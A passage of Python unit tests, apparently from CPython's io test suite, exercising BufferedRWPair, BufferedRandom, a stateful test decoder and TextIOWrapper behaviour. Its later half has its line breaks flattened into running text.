    def test_read(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertEqual(pair.read(3), b"abc")
        self.assertEqual(pair.read(1), b"d")
        self.assertEqual(pair.read(), b"ef")
        pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
        self.assertEqual(pair.read(None), b"abc")

    def test_readlines(self):
        pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])

    def test_read1(self):
        # .read1() is delegated to the underlying reader object, so this test
        # can be shallow.
        # (Body of test_read1, continued.)
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read1(3), b"abc")
        self.assertEqual(pair.read1(), b"def")

    def test_readinto(self):
        # Both readinto and readinto1 fill a writable bytes-like in place.
        for method in ("readinto", "readinto1"):
            with self.subTest(method):
                pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
                data = byteslike(b'\0' * 5)
                self.assertEqual(getattr(pair, method)(data), 5)
                self.assertEqual(bytes(data), b"abcde")

    def test_write(self):
        # Writes go to the writer half; the caller's buffer must be copied
        # (mutating it after write() must not change the flushed data).
        w = self.MockRawIO()
        pair = self.tp(self.MockRawIO(), w)

        pair.write(b"abc")
        pair.flush()
        buffer = bytearray(b"def")
        pair.write(buffer)
        buffer[:] = b"***"  # Overwrite our copy of the data
        pair.flush()
        self.assertEqual(w._write_stack, [b"abc", b"def"])

    def test_peek(self):
        # peek() does not advance the read position.
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertTrue(pair.peek(3).startswith(b"abc"))
        self.assertEqual(pair.read(3), b"abc")

    def test_readable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.readable())

    def test_writeable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.writable())

    def test_seekable(self):
        # BufferedRWPairs are never seekable, even if their readers and writers
        # are.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.seekable())

    # .flush() is delegated to the underlying writer object and has been
    # tested in the test_write method.

    def test_close_and_closed(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)
        pair.close()
        self.assertTrue(pair.closed)

    def test_reader_close_error_on_close(self):
        # If the reader's close() raises, the pair is still marked closed and
        # the writer is still closed; the error propagates.
        def reader_close():
            reader_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertTrue(pair.closed)
        self.assertFalse(reader.closed)
        self.assertTrue(writer.closed)

        # Silence destructor error
        reader.close = lambda: None

    def test_writer_close_error_on_close(self):
        # If the writer's close() raises, the reader is still closed but the
        # pair is NOT marked closed.
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('writer_non_existing', str(err.exception))
        self.assertFalse(pair.closed)
        self.assertTrue(reader.closed)
        self.assertFalse(writer.closed)

        # Silence destructor error
        writer.close = lambda: None
        writer = None

        # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
        with support.catch_unraisable_exception():
            # Ignore BufferedRWPair unraisable exception
            with support.catch_unraisable_exception():
                pair = None
                support.gc_collect()
            support.gc_collect()

    def test_reader_writer_close_error_on_close(self):
        # When both halves fail to close, the reader's error is raised with
        # the writer's error chained as __context__.
        def reader_close():
            reader_non_existing
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('writer_non_existing', str(err.exception.__context__))
        self.assertFalse(pair.closed)
        self.assertFalse(reader.closed)
        self.assertFalse(writer.closed)

        # Silence destructor error
        reader.close = lambda: None
        writer.close = lambda: None

    def test_isatty(self):
        # The pair is a tty if either half is a tty.
        class SelectableIsAtty(MockRawIO):
            def __init__(self, isatty):
                MockRawIO.__init__(self)
                self._isatty = isatty
            def isatty(self):
                return self._isatty

        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
        self.assertFalse(pair.isatty())

        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
        self.assertTrue(pair.isatty())

        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())

        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())

    def test_weakref_clearing(self):
        brw = self.tp(self.MockRawIO(), self.MockRawIO())
        ref = weakref.ref(brw)
        brw = None
        ref = None # Shouldn't segfault.


class CBufferedRWPairTest(BufferedRWPairTest):
    tp = io.BufferedRWPair

class PyBufferedRWPairTest(BufferedRWPairTest):
    tp = pyio.BufferedRWPair


class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
    # Inherits both reader and writer suites; read/write on one object.
    read_mode = "rb+"
    write_mode = "wb+"

    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        BufferedWriterTest.test_constructor(self)

    def test_uninitialized(self):
        BufferedReaderTest.test_uninitialized(self)
        BufferedWriterTest.test_uninitialized(self)

    def test_read_and_write(self):
        raw = self.MockRawIO((b"asdf", b"ghjk"))
        rw = self.tp(raw, 8)

        self.assertEqual(b"as", rw.read(2))
        rw.write(b"ddd")
        rw.write(b"eee")
        self.assertFalse(raw._write_stack)  # Buffer writes
        self.assertEqual(b"ghjk", rw.read())
        self.assertEqual(b"dddeee", raw._write_stack[0])

    def test_seek_and_tell(self):
        # tell() must stay accurate across mixed reads, writes and seeks
        # with all three whence values.
        raw = self.BytesIO(b"asdfghjkl")
        rw = self.tp(raw)

        self.assertEqual(b"as", rw.read(2))
        self.assertEqual(2, rw.tell())
        rw.seek(0, 0)
        self.assertEqual(b"asdf", rw.read(4))

        rw.write(b"123f")
        rw.seek(0, 0)
        self.assertEqual(b"asdf123fl", rw.read())
        self.assertEqual(9, rw.tell())
        rw.seek(-4, 2)
        self.assertEqual(5, rw.tell())
        rw.seek(2, 1)
        self.assertEqual(7, rw.tell())
        self.assertEqual(b"fl", rw.read(11))
        rw.flush()
        self.assertEqual(b"asdf123fl", raw.getvalue())
        # (Tail of test_seek_and_tell: float offsets are rejected.)
        self.assertRaises(TypeError, rw.seek, 0.0)

    def check_flush_and_read(self, read_func):
        # Shared driver: interleave writes with reads performed via
        # read_func(bufio, [n]) and verify flush() keeps positions coherent.
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)

        self.assertEqual(b"ab", read_func(bufio, 2))
        bufio.write(b"12")
        self.assertEqual(b"ef", read_func(bufio, 2))
        self.assertEqual(6, bufio.tell())
        bufio.flush()
        self.assertEqual(6, bufio.tell())
        self.assertEqual(b"ghi", read_func(bufio))
        raw.seek(0, 0)
        raw.write(b"XYZ")
        # flush() resets the read buffer
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"XYZ", read_func(bufio, 3))

    def test_flush_and_read(self):
        self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))

    def test_flush_and_readinto(self):
        def _readinto(bufio, n=-1):
            b = bytearray(n if n >= 0 else 9999)
            n = bufio.readinto(b)
            return bytes(b[:n])
        self.check_flush_and_read(_readinto)

    def test_flush_and_peek(self):
        def _peek(bufio, n=-1):
            # This relies on the fact that the buffer can contain the whole
            # raw stream, otherwise peek() can return less.
            b = bufio.peek(n)
            if n != -1:
                b = b[:n]
            bufio.seek(len(b), 1)
            return b
        self.check_flush_and_read(_peek)

    def test_flush_and_write(self):
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)

        bufio.write(b"123")
        bufio.flush()
        bufio.write(b"45")
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"12345fghi", raw.getvalue())
        self.assertEqual(b"12345fghi", bufio.read())

    def test_threads(self):
        BufferedReaderTest.test_threads(self)
        BufferedWriterTest.test_threads(self)

    def test_writes_and_peek(self):
        def _peek(bufio):
            bufio.peek(1)
        self.check_writes(_peek)
        def _peek(bufio):
            pos = bufio.tell()
            bufio.seek(-1, 1)
            bufio.peek(1)
            bufio.seek(pos, 0)
        self.check_writes(_peek)

    def test_writes_and_reads(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.read(1)
        self.check_writes(_read)

    def test_writes_and_read1s(self):
        def _read1(bufio):
            bufio.seek(-1, 1)
            bufio.read1(1)
        self.check_writes(_read1)

    def test_writes_and_readintos(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.readinto(bytearray(1))
        self.check_writes(_read)

    def test_write_after_readahead(self):
        # Issue #6629: writing after the buffer was filled by readahead should
        # first rewind the raw stream.
        for overwrite_size in [1, 5]:
            raw = self.BytesIO(b"A" * 10)
            bufio = self.tp(raw, 4)
            # Trigger readahead
            self.assertEqual(bufio.read(1), b"A")
            self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if it needs so
            bufio.write(b"B" * overwrite_size)
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            # If the write size was smaller than the buffer size, flush() and
            # check that rewind happens.
            bufio.flush()
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            s = raw.getvalue()
            self.assertEqual(s,
                b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))

    def test_write_rewind_write(self):
        # Various combinations of reading / writing / seeking backwards / writing again
        def mutate(bufio, pos1, pos2):
            assert pos2 >= pos1
            # Fill the buffer
            bufio.seek(pos1)
            bufio.read(pos2 - pos1)
            bufio.write(b'\x02')
            # This writes earlier than the previous write, but still inside
            # the buffer.
            bufio.seek(pos1)
            bufio.write(b'\x01')

        b = b"\x80\x81\x82\x83\x84"
        for i in range(0, len(b)):
            for j in range(i, len(b)):
                raw = self.BytesIO(b)
                bufio = self.tp(raw, 100)
                mutate(bufio, i, j)
                bufio.flush()
                expected = bytearray(b)
                expected[j] = 2
                expected[i] = 1
                self.assertEqual(raw.getvalue(), expected,
                                 "failed result for i=%d, j=%d" % (i, j))

    def test_truncate_after_read_or_write(self):
        # truncate() with no argument truncates at the logical position,
        # whether the pending state is a read buffer or a write buffer.
        raw = self.BytesIO(b"A" * 10)
        bufio = self.tp(raw, 100)
        self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
        self.assertEqual(bufio.truncate(), 2)
        self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
        self.assertEqual(bufio.truncate(), 4)

    def test_misbehaved_io(self):
        BufferedReaderTest.test_misbehaved_io(self)
        BufferedWriterTest.test_misbehaved_io(self)

    def test_interleaved_read_write(self):
        # Test for issue #12213
        with self.BytesIO(b'abcdefgh') as raw:
            with self.tp(raw, 100) as f:
                f.write(b"1")
                self.assertEqual(f.read(1), b'b')
                f.write(b'2')
                self.assertEqual(f.read1(1), b'd')
                f.write(b'3')
                buf = bytearray(1)
                f.readinto(buf)
                self.assertEqual(buf, b'f')
                f.write(b'4')
                self.assertEqual(f.peek(1), b'h')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b2d3f4h')

        with self.BytesIO(b'abc') as raw:
            with self.tp(raw, 100) as f:
                self.assertEqual(f.read(1), b'a')
                f.write(b"2")
                self.assertEqual(f.read(1), b'c')
                f.flush()
                self.assertEqual(raw.getvalue(), b'a2c')

    def test_interleaved_readline_write(self):
        with self.BytesIO(b'ab\ncdef\ng\n') as raw:
            with self.tp(raw) as f:
                f.write(b'1')
                self.assertEqual(f.readline(), b'b\n')
                f.write(b'2')
                self.assertEqual(f.readline(), b'def\n')
                f.write(b'3')
                self.assertEqual(f.readline(), b'\n')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')

    # You can't construct a BufferedRandom over a non-seekable stream.
    test_unseekable = None

    # writable() returns True, so there's no point to test it over
    # a writable stream.
    # (Disables the inherited read-only-truncate test; see comment above.)
    test_truncate_on_read_only = None


class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
    # Runs the shared BufferedRandomTest suite against the C implementation.
    tp = io.BufferedRandom

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedRandomTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_garbage_collection(self):
        CBufferedReaderTest.test_garbage_collection(self)
        CBufferedWriterTest.test_garbage_collection(self)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedRandom"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)


class PyBufferedRandomTest(BufferedRandomTest):
    # Runs the shared suite against the pure-Python implementation.
    tp = pyio.BufferedRandom


# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
#   - A single output character can correspond to many bytes of input.
#   - The number of input bytes to complete the character can be
#     undetermined until the last input byte is received.
#   - The number of input bytes can vary depending on previous input.
#   - A single input byte can correspond to many characters of output.
#   - The number of output characters can be undetermined until the
#     last input byte is received.
#   - The number of output characters can vary depending on previous input.

class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
    """
    For testing seek/tell behavior with a stateful, buffering decoder.

    Input is a sequence of words. Words may be fixed-length (length set
    by input) or variable-length (period-terminated). In variable-length
    mode, extra periods are ignored. Possible words are:
      - 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are space-terminated.
      - 'o' followed by a number sets the output length, O (maximum 99).
      - Any other word is converted into a word followed by a period on
        the output. The output word consists of the input word truncated
        or padded out with hyphens to make its length equal to O. If O is
        0, the word is output verbatim without truncating or padding.
    I and O are initially set to 1. When I changes, any buffered input is
    re-scanned according to the new I. EOF also terminates the last word.
    """

    def __init__(self, errors='strict'):
        codecs.IncrementalDecoder.__init__(self, errors)
        self.reset()

    def __repr__(self):
        return '<SID %x>' % id(self)

    def reset(self):
        # i: current input word length (0 = variable-length mode)
        # o: current output word length (0 = verbatim)
        # buffer: bytes of the partially-received current word
        self.i = 1
        self.o = 1
        self.buffer = bytearray()

    def getstate(self):
        i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
        return bytes(self.buffer), i*100 + o

    def setstate(self, state):
        # Inverse of getstate(): unpack (buffer bytes, i*100 + o).
        buffer, io = state
        self.buffer = bytearray(buffer)
        i, o = divmod(io, 100)
        self.i, self.o = i ^ 1, o ^ 1

    def decode(self, input, final=False):
        """Decode *input* byte-by-byte, emitting completed words."""
        output = ''
        for b in input:
            if self.i == 0: # variable-length, terminated with period
                if b == ord('.'):
                    if self.buffer:
                        output += self.process_word()
                else:
                    self.buffer.append(b)
            else: # fixed-length, terminate after self.i bytes
                self.buffer.append(b)
                if len(self.buffer) == self.i:
                    output += self.process_word()
        if final and self.buffer: # EOF terminates the last word
            output += self.process_word()
        return output

    def process_word(self):
        """Consume the buffered word: control word ('i'/'o' prefix) updates
        state and emits nothing; any other word is padded/truncated to
        length o and emitted with a trailing period."""
        output = ''
        if self.buffer[0] == ord('i'):
            self.i = min(99, int(self.buffer[1:] or 0)) # set input length
        elif self.buffer[0] == ord('o'):
            self.o = min(99, int(self.buffer[1:] or 0)) # set output length
        else:
            output = self.buffer.decode('ascii')
            if len(output) < self.o:
                output += '-'*self.o # pad out with hyphens
            if self.o:
                output = output[:self.o] # truncate to output length
            output += '.'
        self.buffer = bytearray()
        return output

    # When False, lookupTestDecoder refuses to resolve 'test_decoder';
    # individual tests flip this on.
    codecEnabled = False

    @classmethod
    def lookupTestDecoder(cls, name):
        if cls.codecEnabled and name == 'test_decoder':
            latin1 = codecs.lookup('latin-1')
            return codecs.CodecInfo(
                name='test_decoder', encode=latin1.encode, decode=None,
                incrementalencoder=None,
                streamreader=None, streamwriter=None,
                incrementaldecoder=cls)

# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)


class StatefulIncrementalDecoderTest(unittest.TestCase):
    """
    Make sure the StatefulIncrementalDecoder actually works.
    """

    # Each entry: (input bytes, final flag, expected decoded output).
    test_cases = [
        # I=1, O=1 (fixed-length input == fixed-length output)
        (b'abcd', False, 'a.b.c.d.'),
        # I=0, O=0 (variable-length input, variable-length output)
        (b'oiabcd', True, 'abcd.'),
        # I=0, O=0 (should ignore extra periods)
        (b'oi...abcd...', True, 'abcd.'),
        # I=0, O=6 (variable-length input, fixed-length output)
        (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
        # I=2, O=6 (fixed-length input < fixed-length output)
        (b'i.i2.o6xyz', True, 'xy----.z-----.'),
        # I=6, O=3 (fixed-length input > fixed-length output)
        (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
        # I=0, then 3; O=29, then 15 (with longer output)
        (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
         'a----------------------------.' +
         'b----------------------------.' +
         'cde--------------------------.' +
         'abcdefghijabcde.' +
         'a.b------------.' +
         '.c.------------.' +
         'd.e------------.' +
         'k--------------.' +
         'l--------------.' +
         'm--------------.')
    ]

    def test_decoder(self):
        # Try a few one-shot test cases.
        for input, eof, output in self.test_cases:
            d = StatefulIncrementalDecoder()
            self.assertEqual(d.decode(input, eof), output)

        # Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder() self.assertEqual(d.decode(b'oiabcd'), '') self.assertEqual(d.decode(b'', 1), 'abcd.') class TextIOWrapperTest(unittest.TestCase): def setUp(self): self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n" self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii") support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def test_constructor(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) t.__init__(b, encoding="latin-1", newline="\r\n") self.assertEqual(t.encoding, "latin-1") self.assertEqual(t.line_buffering, False) t.__init__(b, encoding="utf-8", line_buffering=True) self.assertEqual(t.encoding, "utf-8") self.assertEqual(t.line_buffering, True) self.assertEqual("\xe9\n", t.readline()) self.assertRaises(TypeError, t.__init__, b, newline=42) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') def test_uninitialized(self): t = self.TextIOWrapper.__new__(self.TextIOWrapper) del t t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', t.read, 0) t.__init__(self.MockRawIO()) self.assertEqual(t.read(0), '') def test_non_text_encoding_codecs_are_rejected(self): # Ensure the constructor complains if passed a codec that isn't # marked as a text encoding # http://bugs.python.org/issue20404 r = self.BytesIO() b = self.BufferedWriter(r) with self.assertRaisesRegex(LookupError, "is not a text encoding"): self.TextIOWrapper(b, encoding="hex") def test_detach(self): r = self.BytesIO() b = self.BufferedWriter(r) t = self.TextIOWrapper(b) self.assertIs(t.detach(), b) t = self.TextIOWrapper(b, encoding="ascii") t.write("howdy") self.assertFalse(r.getvalue()) t.detach() self.assertEqual(r.getvalue(), b"howdy") self.assertRaises(ValueError, t.detach) # Operations independent of the detached stream should still work repr(t) self.assertEqual(t.encoding, 
"ascii") self.assertEqual(t.errors, "strict") self.assertFalse(t.line_buffering) self.assertFalse(t.write_through) def test_repr(self): raw = self.BytesIO("hello".encode("utf-8")) b = self.BufferedReader(raw) t = self.TextIOWrapper(b, encoding="utf-8") modname = self.TextIOWrapper.__module__ self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname) raw.name = "dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname) t.mode = "r" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname) raw.name = b"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname) t.buffer.detach() repr(t) # Should not raise an exception def test_recursive_repr(self): # Issue #25455 raw = self.BytesIO() t = self.TextIOWrapper(raw) with support.swap_attr(raw, 'name', t): try: repr(t) # Should not crash except RuntimeError: pass def test_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=True) t.write("X") self.assertEqual(r.getvalue(), b"") # No flush happened t.write("Y\nZ") self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed t.write("A\rB") self.assertEqual(r.getvalue(), b"XY\nZA\rB") def test_reconfigure_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=False) t.write("AB\nC") self.assertEqual(r.getvalue(), b"") t.reconfigure(line_buffering=True) # implicit flush self.assertEqual(r.getvalue(), b"AB\nC") t.write("DEF\nG") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.write("H") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.reconfigure(line_buffering=False) # implicit flush self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") t.write("IJ") self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") # Keeping default value t.reconfigure() t.reconfigure(line_buffering=None) 
self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="replace") 
self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. 
for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): 
l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(support.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(support.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def 
